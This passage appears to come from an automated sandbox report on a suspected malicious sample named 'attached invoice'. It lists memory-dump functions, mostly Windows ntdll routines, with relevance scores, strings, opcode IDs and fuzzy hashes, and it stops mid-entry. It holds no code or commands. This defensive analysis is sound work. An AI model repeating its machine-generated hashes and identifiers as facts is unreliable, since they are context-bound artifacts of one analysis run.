                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                    • Opcode ID: af710c44b0986ae064d4913bb154d73f9001bb4599c8f951ad2d0a100b4254a2
                                                                                                    • Instruction ID: 70f24371d8617c7693daeb5d15a0af78d9daf45ce050ee87209e826703d29b93
                                                                                                    • Opcode Fuzzy Hash: af710c44b0986ae064d4913bb154d73f9001bb4599c8f951ad2d0a100b4254a2
                                                                                                    • Instruction Fuzzy Hash: 1B01F4B2159744AFD311DF14CD45F2677E8E740B25F008939E65CC7694E734E940CB45
                                                                                                    Function 018EC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: MUI
                                                                                                    • API String ID: 0-1339004836
                                                                                                    • Opcode ID: 845957cd9243578704eb9e0a1f6cfbf2a4afebc4b18daab7d56c01fd6828a545
                                                                                                    • Instruction ID: 5e6b93760af01087e8c72a2f722e2c223f17af120a7353d6622693a3de228e5e
                                                                                                    • Opcode Fuzzy Hash: 845957cd9243578704eb9e0a1f6cfbf2a4afebc4b18daab7d56c01fd6828a545
                                                                                                    • Instruction Fuzzy Hash: 6E827C75E002199FEB24CFA9C988BEDBBF1FF4A314F148169E919EB251D7309A45CB40
                                                                                                    Function 0197C7B0 Relevance: 1.6, Strings: 1, Instructions: 353COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: w
                                                                                                    • API String ID: 0-476252946
                                                                                                    • Opcode ID: 38b5185d3da0fd6f2ad42c4a04f37f40449d81b6b359b8ab53ff1d181d03e62a
                                                                                                    • Instruction ID: 7319e2bb183bcfec21a1ff92e4c533141ab7af8de43dcfebe5b2b4390eab799c
                                                                                                    • Opcode Fuzzy Hash: 38b5185d3da0fd6f2ad42c4a04f37f40449d81b6b359b8ab53ff1d181d03e62a
                                                                                                    • Instruction Fuzzy Hash: 96D1AA3090021BABDB28CF58C482ABEBBF5FF44715F14845AE89DAB241F735E991D790
                                                                                                    Function 019847B4 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: e3cd3d9ada6bd6db9382046981b24892f088be86de044bccb441b7718f6ec174
                                                                                                    • Instruction ID: 967870e9e47727a1367d619ed5576bc178d878b085dedadc50be2d21ce7514d5
                                                                                                    • Opcode Fuzzy Hash: e3cd3d9ada6bd6db9382046981b24892f088be86de044bccb441b7718f6ec174
                                                                                                    • Instruction Fuzzy Hash: 99A16F71E0020B9FEB15EF98C880BAEFBB9EF18741F144429EA19EB250E7759940CB54
                                                                                                    Function 019660A0 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: d175579d52eb97aeec217c713b56ffcc50b1d941249e62fc75509b9862d3c70f
                                                                                                    • Instruction ID: f40404f5c809b4dd97cb98817e74856e7ee964dd09c617b3098c33e2647f82b7
                                                                                                    • Opcode Fuzzy Hash: d175579d52eb97aeec217c713b56ffcc50b1d941249e62fc75509b9862d3c70f
                                                                                                    • Instruction Fuzzy Hash: 76918271A00619AFEB21DF98CD85FAEBBBCEF45B50F100465F604AB291D775E900CBA0
                                                                                                    Function 0191A580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: GlobalTags
                                                                                                    • API String ID: 0-1106856819
                                                                                                    • Opcode ID: ec24b0deeb49da826f4b1ecfbd8c1199ff9de61123f69405f42c3fbb37ac0125
                                                                                                    • Instruction ID: 91b2e155f78538fc7943672e159cecef58333d38d3b901be277c51cdc0322d9f
                                                                                                    • Opcode Fuzzy Hash: ec24b0deeb49da826f4b1ecfbd8c1199ff9de61123f69405f42c3fbb37ac0125
                                                                                                    • Instruction Fuzzy Hash: 1071A071E0120ADFEF58CF9CD580AADBBB6BF88715F54852EE909B7244D7318941CB60
                                                                                                    Function 018F02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #%u
                                                                                                    • API String ID: 0-232158463
                                                                                                    • Opcode ID: ef25f7ba71660eeccf4e54d3d9cddfc0ad8d8b4cac23e255530502951b336247
                                                                                                    • Instruction ID: 5b499cbebe0b1c2724308354909b3504ade64dd115d523a96eb766cd99036bb7
                                                                                                    • Opcode Fuzzy Hash: ef25f7ba71660eeccf4e54d3d9cddfc0ad8d8b4cac23e255530502951b336247
                                                                                                    • Instruction Fuzzy Hash: D3715B71A0010A9FDB05DFA9C984FAEB7F8FF48704F154069EA05E7251EB34EA41CBA0
                                                                                                    Function 019844F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .mui
                                                                                                    • API String ID: 0-1199573805
                                                                                                    • Opcode ID: 85c975956c0bc5fee2865d49e00baac42d33151d1a541b469545cf0bd8e7a666
                                                                                                    • Instruction ID: 331229781409916bf3f3a7f5cfb0710e8a91df995635531381e35c5b8349245b
                                                                                                    • Opcode Fuzzy Hash: 85c975956c0bc5fee2865d49e00baac42d33151d1a541b469545cf0bd8e7a666
                                                                                                    • Instruction Fuzzy Hash: 49519371D0022BDBDF15EF99D844BAEBBB8BF59B04F054129EA15AB240D7349D01CBA0
                                                                                                    Function 018FE547 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: EXT-
                                                                                                    • API String ID: 0-1948896318
                                                                                                    • Opcode ID: 9af292da7d5f4a49fabf79bdded9d28fee1455df6bfb81bb0c5bba6ac9c74fd5
                                                                                                    • Instruction ID: b4143ab6a21abe100b2be615ae15bc32ccadd6f64f244cb66043de209e97d5dc
                                                                                                    • Opcode Fuzzy Hash: 9af292da7d5f4a49fabf79bdded9d28fee1455df6bfb81bb0c5bba6ac9c74fd5
                                                                                                    • Instruction Fuzzy Hash: 6A4193725053069BD720DA69C844F6BB7D8AF88B14F05092DF784D7290E778DB04C797
                                                                                                    Function 018DCD8A Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: AlternateCodePage
                                                                                                    • API String ID: 0-3889302423
                                                                                                    • Opcode ID: 656d00667fc195d07e822646b39537cac88ae883d0e04385f5715b1572381b6f
                                                                                                    • Instruction ID: aad9b685fae222645921cf2b80635b74d5884e2125a7955a496c5af3e9d744a8
                                                                                                    • Opcode Fuzzy Hash: 656d00667fc195d07e822646b39537cac88ae883d0e04385f5715b1572381b6f
                                                                                                    • Instruction Fuzzy Hash: 9841BD76D00219AADF29DB98CC80AEEBBBCEF84710F14416AE559E3250E7749F41CB90
                                                                                                    Function 019141BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 4c5414fe02651a0a74b12c5307bc4a07ca440cd504d15dcec85307b7330aed3f
                                                                                                    • Instruction ID: a83bab1d98a615b09ea35f9fb1f5305fa920ed9f9f5492585b566e5ae7ccfda3
                                                                                                    • Opcode Fuzzy Hash: 4c5414fe02651a0a74b12c5307bc4a07ca440cd504d15dcec85307b7330aed3f
                                                                                                    • Instruction Fuzzy Hash: 5A517D716047159FD320DF59C841A6BBBF8FF88710F00892EFA9997690E774E944CB91
                                                                                                    Function 0196CB20 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 27c6c3315c080199464737aa223bc039501a2e9e9180fc9f8c7e718591eb08be
                                                                                                    • Instruction ID: c301b1dcb31a72049d50c972d1c729c8da18fe203136beaeb545c61254d522e6
                                                                                                    • Opcode Fuzzy Hash: 27c6c3315c080199464737aa223bc039501a2e9e9180fc9f8c7e718591eb08be
                                                                                                    • Instruction Fuzzy Hash: 4B41ADB1E002199FDB21AFA9C940A6EBBB8FF54B00F00452EFA49DB258D774D941CB61
                                                                                                    Function 0199ADD6 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: PreferredUILanguages
                                                                                                    • API String ID: 0-1884656846
                                                                                                    • Opcode ID: 9d65a0923974897a483404c02bd74482e0988e15c0788eb67fa58b74e0f9e0ae
                                                                                                    • Instruction ID: fb59a2d630fb21821148187c5f00e6a9b2824b95e69b115d4e8eaad7d6685114
                                                                                                    • Opcode Fuzzy Hash: 9d65a0923974897a483404c02bd74482e0988e15c0788eb67fa58b74e0f9e0ae
                                                                                                    • Instruction Fuzzy Hash: 6641837290021AABDF21DA9CC840FEEB7BDEF54751F15456AEA09E7290D634EE40C7A0
                                                                                                    Function 0195C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BinaryHash
                                                                                                    • API String ID: 0-2202222882
                                                                                                    • Opcode ID: 0eef87e21a124bce6a6aa18fc4346381e17563ba9a85695bbc3170199f1858d0
                                                                                                    • Instruction ID: 06de8bcdb78faf0ffde1dc415ab61bdee9aab600dfe875edd0fe0b02aa8c3a0b
                                                                                                    • Opcode Fuzzy Hash: 0eef87e21a124bce6a6aa18fc4346381e17563ba9a85695bbc3170199f1858d0
                                                                                                    • Instruction Fuzzy Hash: 4D4110B190022DAADB61DB50CC84FDEB77CAB84714F0045A5EB0CB7141DB709E898FA4
                                                                                                    Function 01986BDE Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: kLsE
                                                                                                    • API String ID: 0-3058123920
                                                                                                    • Opcode ID: aa00ec4bd543fb4f827f5cf461786fc4f71afd1b96ad40253c3379e958c69454
                                                                                                    • Instruction ID: 46812bfc59891adb5263c49c0a86a3a7a0f4d1120292cbdc830f51e5a6731576
                                                                                                    • Opcode Fuzzy Hash: aa00ec4bd543fb4f827f5cf461786fc4f71afd1b96ad40253c3379e958c69454
                                                                                                    • Instruction Fuzzy Hash: 8141253290A34186E731BFA8E9887A93F98EB91765F24011DEA588F0C9CBB445C5C7A1
                                                                                                    Function 0195C920 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TrustedInstaller
                                                                                                    • API String ID: 0-565535830
                                                                                                    • Opcode ID: 34f22288b47818d89dd6bb84de7b591f9b94620627ae2736c66c6b50c37a2186
                                                                                                    • Instruction ID: dfa4138dab288ee259c2e74f47e2cd8339b514361d214b37797bafd20afd2137
                                                                                                    • Opcode Fuzzy Hash: 34f22288b47818d89dd6bb84de7b591f9b94620627ae2736c66c6b50c37a2186
                                                                                                    • Instruction Fuzzy Hash: D5318F7294061ABBDB22EB98CC50FAEBBBDEB54B50F000029FA04EB150D770DE41CB90
                                                                                                    Function 019766D0 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #
                                                                                                    • API String ID: 0-1885708031
                                                                                                    • Opcode ID: 91342f0e78886dcaba54c09bcc9b2aba3ec19f2ef72fb47f3e20c1b52ecb2587
                                                                                                    • Instruction ID: 416233d4ebd4a23f706643c6d7f9da8a967ab21448c0b21a99d9819c8738dcb0
                                                                                                    • Opcode Fuzzy Hash: 91342f0e78886dcaba54c09bcc9b2aba3ec19f2ef72fb47f3e20c1b52ecb2587
                                                                                                    • Instruction Fuzzy Hash: E3310A31600B199AFB22DE6CC840FEEF7BC9F45B45F144028E9489B282F775E905CB50
                                                                                                    Function 01980AE0 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @
                                                                                                    • API String ID: 0-2766056989
                                                                                                    • Opcode ID: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
                                                                                                    • Instruction ID: 15f9a8cdcc726a0ce26295df6f39e54c44c13680f66f30867421bbd85d6a1e39
                                                                                                    • Opcode Fuzzy Hash: 5ab56d2b180bb44ac9b81ade9d7e8da0aada14e332b8b9d6ea5bba702a491824
                                                                                                    • Instruction Fuzzy Hash: 0E315DB1108345AFD711EF14C805E9BBBE8EFD4754F444A2EF69893190E7B0E908CB92
                                                                                                    Function 0195C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: BinaryName
                                                                                                    • API String ID: 0-215506332
                                                                                                    • Opcode ID: 1809c719f3cb1e9c19d283d9893079a70738878799914b7a0df2cd61262befd2
                                                                                                    • Instruction ID: 0f526cbf07930d4b5c2d0f04e8cc68e97414f60d691559c3f97fc4e3b4c5b2d4
                                                                                                    • Opcode Fuzzy Hash: 1809c719f3cb1e9c19d283d9893079a70738878799914b7a0df2cd61262befd2
                                                                                                    • Instruction Fuzzy Hash: 3A31C57690061AAFDB16DB58C845D6FBB7CEB80B20F114569ED09BB651D730DE00C7D0
                                                                                                    Function 0197AA40 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0197AABF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                    • API String ID: 0-1911121157
                                                                                                    • Opcode ID: 1a3aa564f2671fd42334957bbb74d7e93071346684d70c8dedf6a0eada14a56e
                                                                                                    • Instruction ID: 3c148d6ee29e755e8ae6376d892a9636981b7ba505ed2db605c42023be38fc33
                                                                                                    • Opcode Fuzzy Hash: 1a3aa564f2671fd42334957bbb74d7e93071346684d70c8dedf6a0eada14a56e
                                                                                                    • Instruction Fuzzy Hash: C6312972A00618AFD711DF58CD45F6EBBBAFF84B10F158629F50997644D7389840CB90
                                                                                                    Function 01908BD1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: WindowsExcludedProcs
                                                                                                    • API String ID: 0-3583428290
                                                                                                    • Opcode ID: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                                    • Instruction ID: ae8da9c32ff27e553c734a40e2c05074ddda3673bb17567da6c82b011e8e4698
                                                                                                    • Opcode Fuzzy Hash: 28ec05bb75e60007dc76649bfeece563ac1f16d6a5e27de73284d7176d7d3b6d
                                                                                                    • Instruction Fuzzy Hash: F721C876E02135BFDB239E998884F5B7BBDEF91A91F054035AA0C9B150C634DD01C7A0
                                                                                                    Function 019685AA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 019685DE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                    • API String ID: 0-702105204
                                                                                                    • Opcode ID: 050814c6fd742c8fdac5de540bdb25b9c0f5a683152d31576e551cb60ed3c3af
                                                                                                    • Instruction ID: 1488fcd489aa156c308ffa5ff61e0362bc472c41a74a907462d72463e3c2131b
                                                                                                    • Opcode Fuzzy Hash: 050814c6fd742c8fdac5de540bdb25b9c0f5a683152d31576e551cb60ed3c3af
                                                                                                    • Instruction Fuzzy Hash: 300126312043059BE7316E59DC88E6A7BBDEF91755F05042CF70947556CB60AC84DBB4
                                                                                                    Function 01996B77 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • Critical error detected %lx, xrefs: 01996BA7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Critical error detected %lx
                                                                                                    • API String ID: 0-802127002
                                                                                                    • Opcode ID: 9235aa6ba7b6be6bdd31dba721fa57044ea39360c33217af6b843e4281e258d6
                                                                                                    • Instruction ID: 978fd5f624b34a0fa3e1eb094d378daa3ca6c2f2d769510647163234599dd405
                                                                                                    • Opcode Fuzzy Hash: 9235aa6ba7b6be6bdd31dba721fa57044ea39360c33217af6b843e4281e258d6
                                                                                                    • Instruction Fuzzy Hash: 9B1157B6D443488BEF25DFA8C542BDDBBF0EB44719F20452ED169AB282E3751601CF10
                                                                                                    Function 0192088E Relevance: .6, Instructions: 606COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: e3c15c925993b67905b557ec3148d25aaca630b69560a799e010423efd447c43
                                                                                                    • Instruction ID: 670f60edc9812f901fdb395c43dddc51f7bc9277f42d6d10dc741a3fe3b32520
                                                                                                    • Opcode Fuzzy Hash: e3c15c925993b67905b557ec3148d25aaca630b69560a799e010423efd447c43
                                                                                                    • Instruction Fuzzy Hash: A2427B75900715DFEB61CF28C880BAAB7F9BF44314F1445AAE94DEB245E770AA84CF60
                                                                                                    Function 018F2760 Relevance: .6, Instructions: 605COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5ff8cb4fa13a830eacda343282f94ff378fbf93d8e75f183c70626f31cdeb16
                                                                                                    • Instruction ID: d95bd60bb2f756074b9a78f6db9594c989234743a976f98811ec64a24400dc94
                                                                                                    • Opcode Fuzzy Hash: c5ff8cb4fa13a830eacda343282f94ff378fbf93d8e75f183c70626f31cdeb16
                                                                                                    • Instruction Fuzzy Hash: DC3200B0A007598FEB25CFA9C844BBEBBF6BF86704F24451DE54ADB284D734A941CB50
                                                                                                    Function 018E6970 Relevance: .5, Instructions: 548COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d03b1ba97756caba9a1fd4ff2fa750b310af2f3138875e8f631ae858cb1665d
                                                                                                    • Instruction ID: 238bdb9bc392e83604fb21e6d023b6c4fc036cd02a07c9ac9cd1bd9ea08a5859
                                                                                                    • Opcode Fuzzy Hash: 3d03b1ba97756caba9a1fd4ff2fa750b310af2f3138875e8f631ae858cb1665d
                                                                                                    • Instruction Fuzzy Hash: 7A32BF70A01209CFDB25CF68C484BAABBF5FF59310F248569E95AEB391E731E941CB50
                                                                                                    Function 01904955 Relevance: .4, Instructions: 423COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                    • Instruction ID: 4f81e34beee1d7e31493ac2c4fd32a8291efbdbe97117400700224801f4950bf
                                                                                                    • Opcode Fuzzy Hash: 404bdb3069237242736c87285a47880b8af0925a3db27f9dc6d0c918b918b8ae
                                                                                                    • Instruction Fuzzy Hash: F6F16071E0061A9FDF16CF99D980BEEBBF9AF48711F058129EA19EB284D734D841CB50
                                                                                                    Function 019784BB Relevance: .4, Instructions: 386COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3d99f9912acaa36bceb66d81ba3b36af1af277a78a93e5293087658616bb3d13
                                                                                                    • Instruction ID: cbe569f2126ee46fc451930d62990cea2e7ceebc5cd33cd53952f330aee1e578
                                                                                                    • Opcode Fuzzy Hash: 3d99f9912acaa36bceb66d81ba3b36af1af277a78a93e5293087658616bb3d13
                                                                                                    • Instruction Fuzzy Hash: BBD1E071E0060A9BDF15CF68C845BFEBBF5BF88304F188169D91AE7241EB35E9058B60
                                                                                                    Function 018E64F0 Relevance: .4, Instructions: 383COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
